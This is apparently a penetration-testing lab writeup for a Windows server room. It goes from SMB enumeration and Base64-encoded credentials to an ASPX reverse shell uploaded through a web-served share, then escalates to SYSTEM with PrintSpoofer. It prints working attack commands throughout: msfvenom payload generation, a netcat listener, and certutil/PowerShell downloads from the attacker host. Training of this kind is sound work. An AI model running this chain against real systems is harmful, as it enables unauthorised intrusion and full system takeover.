Relevant

advanced | 1h 10m | Writeup

Penetration test on a Windows server

Learning Objectives

  • Enumerate SMB shares
  • Find credentials
  • Exploit web service
  • Windows privilege escalation

Relevant is a hard-rated penetration test simulation featuring SMB enumeration, encoded credential discovery, an anonymous SMB share that doubles as an IIS web directory, and Windows privilege escalation via SeImpersonatePrivilege (PrintSpoofer/JuicyPotato).

This room simulates a real engagement with minimal guidance. You'll need to think like an actual penetration tester and chain multiple vulnerabilities together.

Reconnaissance

```bash
# Comprehensive port scan (this box has services on high ports!)
nmap -sV -sC -p- TARGET_IP

# Results:
# 80/tcp    - HTTP (IIS)
# 135/tcp   - MSRPC
# 139/tcp   - NetBIOS
# 445/tcp   - SMB
# 3389/tcp  - RDP
# 49663/tcp - HTTP (IIS)
# 49667/tcp - MSRPC
# 49669/tcp - MSRPC

# Don't miss the high ports! Always scan all 65535
# Port 49663 is another web server!
```
This box has important services on non-standard ports. nmap's default scan covers only the 1,000 most common TCP ports, so a quick scan never shows 49663, and without that second IIS instance the whole attack chain below is invisible.

SMB Enumeration

```bash
# List SMB shares over a null session (-N: no password)
smbclient -L //TARGET_IP -N
# Sharename  Type
# ---------  ----
# ADMIN$     Disk
# C$         Disk
# IPC$       IPC
# nt4wrksv   Disk   <- Interesting!

# Access the share
smbclient //TARGET_IP/nt4wrksv -N
smb: \> ls
smb: \> get passwords.txt

# View contents
cat passwords.txt
# [User Passwords - Encoded]
# Qm9iIC0gIVBAJCRXMHJEITEyMw==
# QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```

Base64 Detection

A string drawn from the alphabet A-Za-z0-9+/ whose length is a multiple of 4, often ending in '=' or '==' (padding added when the input length is not a multiple of 3), is almost certainly Base64. Padding is not guaranteed: Bill's 30-byte line encodes to exactly 40 characters with none, so check the alphabet and length rather than just the trailing '='. Always try decoding. Base64 is an encoding, not encryption, so a Base64 "password file" is cleartext credentials to anyone who can read the share.
```bash
# Decode credentials
echo 'Qm9iIC0gIVBAJCRXMHJEITEyMw==' | base64 -d
# Bob - !P@$$W0rD!123

echo 'QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk' | base64 -d
# Bill - Juw4nnaM4n420696969!$$$

# Try credentials against SMB (single quotes keep $ and ! literal)
crackmapexec smb TARGET_IP -u 'Bob' -p '!P@$$W0rD!123'
crackmapexec smb TARGET_IP -u 'Bill' -p 'Juw4nnaM4n420696969!$$$'
# In this room neither pair authenticates to SMB or RDP; they are a rabbit hole.
# The foothold comes from the share itself, as shown next.
```
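An added example, not code from the original writeup: a small POSIX shell script that applies the detection rule above to a whole file instead of eyeballing each line. It extracts every token that fits the Base64 alphabet with a length that is a multiple of 4, decodes it, and keeps only results that are printable text, which is what separates an encoded credential from a random Base64 blob. The sample file is constructed here from the two strings in passwords.txt; the function names are ours.

```shell
#!/bin/sh
# Added example, not from the original writeup. Scans a file for Base64-looking
# tokens and decodes the ones that turn into printable text.

# Candidate tokens: Base64 alphabet, optional padding, length a multiple of 4,
# at least 16 characters so ordinary words are not flagged.
b64_candidates() {   # b64_candidates <file>
    grep -oE '[A-Za-z0-9+/]{16,}={0,2}' "$1" | awk 'length($0) % 4 == 0'
}

# Decode one token; succeed only if the result is non-empty printable text
# (anything else is binary data, not a credential).
b64_try_decode() {   # b64_try_decode <token>
    out=$(printf '%s' "$1" | base64 -d 2>/dev/null) || return 1
    [ -n "$out" ] || return 1
    [ -z "$(printf '%s' "$out" | LC_ALL=C tr -d '[:print:][:space:]')" ] || return 1
    printf '%s\n' "$out"
}

# Walk a file and print "token => decoded" for every hit.
b64_scan() {   # b64_scan <file>
    for tok in $(b64_candidates "$1"); do
        dec=$(b64_try_decode "$tok") && printf '%s => %s\n' "$tok" "$dec"
    done
}

# Constructed sample: the two lines recovered from passwords.txt plus noise.
sample=$(mktemp)
printf '%s\n' '[User Passwords - Encoded]' \
    'Qm9iIC0gIVBAJCRXMHJEITEyMw==' \
    'QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk' \
    'nothing to decode on this line' > "$sample"
b64_scan "$sample"
rm -f "$sample"
```

Point it at any loot file (`b64_scan notes.txt`, or a whole directory with a `find ... -exec` wrapper); the printable-text filter is what keeps it from drowning you in decoded certificates and images.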

Web Server Analysis

The key insight: the nt4wrksv share is not just a file drop. It is a directory inside the web root of the IIS instance on port 49663, so every file you see over SMB is also served over HTTP, and every file you write over SMB is reachable through the web server.

```bash
# Check if SMB share is web-accessible
# The nt4wrksv share might be served by IIS on the high port

curl http://TARGET_IP:49663/nt4wrksv/
# Directory listing! (If directory browsing is off you get a 403 instead;
# request a file name you already know from the share, e.g. /nt4wrksv/passwords.txt)

# Upload a test file via SMB
smbclient //TARGET_IP/nt4wrksv -N
smb: \> put test.txt

# Access via web
curl http://TARGET_IP:49663/nt4wrksv/test.txt
# Works! We can upload and execute files!
```
When a writable SMB share sits under a web root, you can upload server-side code via SMB and have the web server execute it over HTTP. This is a common misconfiguration: a share gets created inside wwwroot for convenience, and IIS will happily run whatever lands there. Remember that anything you drop in is visible to everyone on the network, so remove test files and shells when you are done.
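An added example, not code from the writeup: a POSIX shell probe that turns the manual put-then-curl check above into a repeatable test. It writes a file with a random marker to the share over an anonymous SMB session, fetches the same name from the web directory on 49663, compares the content, and deletes the marker again so nothing is left behind. The target, share name and port are the ones from the scan; the function names, the marker file name and the TARGET/SHARE/WEB variables are ours.

```shell
#!/bin/sh
# Added example, not from the original writeup. Confirms that an anonymous SMB
# share and an IIS virtual directory are the same folder on disk by round-
# tripping a random marker: write it over SMB, read it back over HTTP.
set -u

TARGET="${TARGET:-TARGET_IP}"                         # host from the scan
SHARE="${SHARE:-nt4wrksv}"                            # writable share
WEB="${WEB:-http://${TARGET}:49663/${SHARE}}"         # suspected web mapping

# Upload a local file to the share over a null session (-N: no password).
smb_put() {   # smb_put <localfile> <remotename>
    smbclient "//${TARGET}/${SHARE}" -N -c "put $1 $2" >/dev/null 2>&1
}

# Delete a file from the share; used to clean the marker up.
smb_del() {   # smb_del <remotename>
    smbclient "//${TARGET}/${SHARE}" -N -c "del $1" >/dev/null 2>&1
}

# Fetch a file from the web directory; -f turns 403/404 into a failure.
web_get() {   # web_get <remotename>
    curl -fsS "${WEB}/$1"
}

# Returns 0 when the marker written via SMB comes back unchanged via HTTP,
# 1 otherwise (upload failed, web path differs, or content was altered).
share_is_web_exposed() {
    token=$(head -c 16 /dev/urandom | od -An -tx1 | tr -d ' \n')
    name="probe_${token}.txt"
    tmp=$(mktemp)
    rc=1
    printf '%s\n' "$token" > "$tmp"
    if smb_put "$tmp" "$name"; then
        body=$(web_get "$name" 2>/dev/null || true)
        if [ "$body" = "$token" ]; then rc=0; fi
        smb_del "$name"                  # leave nothing behind either way
    fi
    rm -f "$tmp"
    return $rc
}

# Usage: TARGET=10.10.10.10 sh probe.sh   (SHARE and WEB are optional overrides)
if [ "$TARGET" = "TARGET_IP" ]; then
    echo "set TARGET=<host> to run the probe"
elif share_is_web_exposed; then
    echo "[+] ${SHARE} is served at ${WEB}: upload via SMB, execute via HTTP"
else
    echo "[-] no SMB/HTTP overlap detected for ${SHARE}"
fi
```

The random marker matters: comparing content rather than just an HTTP 200 rules out a default page or a cached copy, and a fixed file name would survive a failed cleanup and tip off the next person to look at the share.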

Getting a Shell

```bash
# Generate ASPX reverse shell (IIS executes .aspx server-side)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f aspx -o shell.aspx

# Upload via SMB
smbclient //TARGET_IP/nt4wrksv -N
smb: \> put shell.aspx
smb: \> quit

# Start listener (in its own terminal, before triggering)
nc -lvnp 4444

# Trigger shell via web (this request blocks for as long as the shell lives)
curl http://TARGET_IP:49663/nt4wrksv/shell.aspx

# Shell received as the application pool identity
whoami
# iis apppool\defaultapppool
```

Privilege Escalation

```bash
# Check privileges
whoami /priv
# Privilege Name                Description                               State
# ============================= ========================================= =======
# SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
# SeCreateGlobalPrivilege       Create global objects                     Enabled
# SeImpersonatePrivilege        Impersonate a client after authentication Enabled

# SeImpersonatePrivilege = Potato attacks!
```
SeImpersonatePrivilege is extremely powerful. It lets a process impersonate the security context of any client that authenticates to a named pipe or RPC endpoint the process controls. Every Potato-family tool works the same way: stand up such an endpoint, coerce a service running as SYSTEM into connecting to it (PrintSpoofer abuses the Print Spooler, JuicyPotato abuses DCOM activation), then impersonate the resulting SYSTEM token to spawn a process. Service accounts such as IIS application pool identities and the MSSQL service account hold this privilege by default, which is why a web shell on Windows so often becomes SYSTEM in one step. SeAssignPrimaryTokenPrivilege showing as "Disabled" is not a mitigation: a process can enable any privilege its token holds, and the tools do exactly that.
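An added example, not from the original writeup: a shell helper that reads saved `whoami /priv` output and flags the privileges that give a direct route to SYSTEM, so a fresh shell can be triaged in one command instead of reading the table by hand. The sample text is constructed from the output shown above; the privilege-to-technique mapping is general Windows knowledge, and the function names are ours. It goes a little beyond the page by covering the other well-known dangerous privileges (SeBackup, SeRestore, SeDebug, SeTakeOwnership, SeLoadDriver), not only SeImpersonate.

```shell
#!/bin/sh
# Added example, not from the original writeup. Triage `whoami /priv` output:
# print the privileges that are known escalation primitives and what to do
# with each. Pipe saved output in on stdin.

# Constructed sample, copied from the table captured in the IIS shell above.
SAMPLE_PRIV='Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled'

# Map a privilege name to the technique it enables; fail for anything else.
priv_hint() {   # priv_hint <SeXxxPrivilege>
    case "$1" in
        SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege)
            echo "Potato family (PrintSpoofer/JuicyPotato/GodPotato): coerce SYSTEM into your pipe, impersonate it" ;;
        SeBackupPrivilege)        echo "read any file: copy SAM and SYSTEM hives, crack or pass the hashes" ;;
        SeRestorePrivilege)       echo "write any file: overwrite a service binary or DLL" ;;
        SeDebugPrivilege)         echo "open any process: duplicate a SYSTEM token" ;;
        SeTakeOwnershipPrivilege) echo "take ownership of protected files and keys" ;;
        SeLoadDriverPrivilege)    echo "load a vulnerable signed driver" ;;
        *) return 1 ;;
    esac
}

# Read whoami /priv text on stdin and print "name (state): hint" per hit.
# Disabled privileges are reported too: a process can enable any privilege
# its token holds, so "Disabled" is not a mitigation. Returns 0 on any hit.
interesting_privs() {
    found=1
    while read -r name rest; do
        case "$name" in Se*Privilege) ;; *) continue ;; esac   # skip header rows
        rest=$(printf '%s' "$rest" | tr -d '\r')                # Windows CRLF
        state=${rest##* }                                      # last column
        hint=$(priv_hint "$name") || continue
        printf '%s (%s): %s\n' "$name" "$state" "$hint"
        found=0
    done
    return $found
}

# Usage: interesting_privs < whoami_priv.txt ; here it runs on the sample.
printf '%s\n' "$SAMPLE_PRIV" | interesting_privs
```

Save the target's output with something like `whoami /priv > C:\Users\Public\priv.txt` and pull it back over the share, or just paste it into a heredoc; the CRLF stripping is there because output captured through a raw TCP shell keeps Windows line endings.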

PrintSpoofer Exploitation

1. Download PrintSpoofer: get PrintSpoofer64.exe from the GitHub releases page
2. Transfer to target: upload via SMB or download with certutil/PowerShell
3. Execute: run PrintSpoofer to spawn a SYSTEM shell
```bash
# On attacker: host PrintSpoofer
python3 -m http.server 80

# On target: download
certutil -urlcache -f http://YOUR_IP/PrintSpoofer64.exe C:\Users\Public\PrintSpoofer64.exe

# Or via PowerShell
powershell -c "Invoke-WebRequest -Uri http://YOUR_IP/PrintSpoofer64.exe -OutFile C:\Users\Public\PrintSpoofer64.exe"

# Execute PrintSpoofer (-i: interact with the new process in this console, -c: command to run)
C:\Users\Public\PrintSpoofer64.exe -i -c cmd
# SYSTEM shell!

whoami
# nt authority\system
```

Alternative: JuicyPotato

JuicyPotato is another option for SeImpersonatePrivilege abuse, but it needs a CLSID that is valid for the target Windows version and it no longer works on Windows 10 1809 / Server 2019 and later because of DCOM hardening. PrintSpoofer is usually simpler and works on newer builds, provided the Print Spooler service is running; where the spooler has been disabled (a common hardening step since PrintNightmare), later variants such as RoguePotato, SweetPotato or GodPotato abuse the same privilege through a different coercion path.
```bash
# Get flags
type C:\Users\Bob\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt
```

Knowledge Check


What made the initial access possible?

Key Takeaways

  • Always scan all 65535 TCP ports: the default top-1000 scan would have missed the IIS instance on 49663
  • Base64 is encoding, not encryption; an "encoded" password file is cleartext credentials
  • A writable SMB share under a web root turns file upload into code execution
  • IIS application pool identities, like other service accounts, hold SeImpersonatePrivilege by default
  • PrintSpoofer abuses SeImpersonatePrivilege by coercing the Print Spooler into authenticating to a named pipe it controls, then impersonates SYSTEM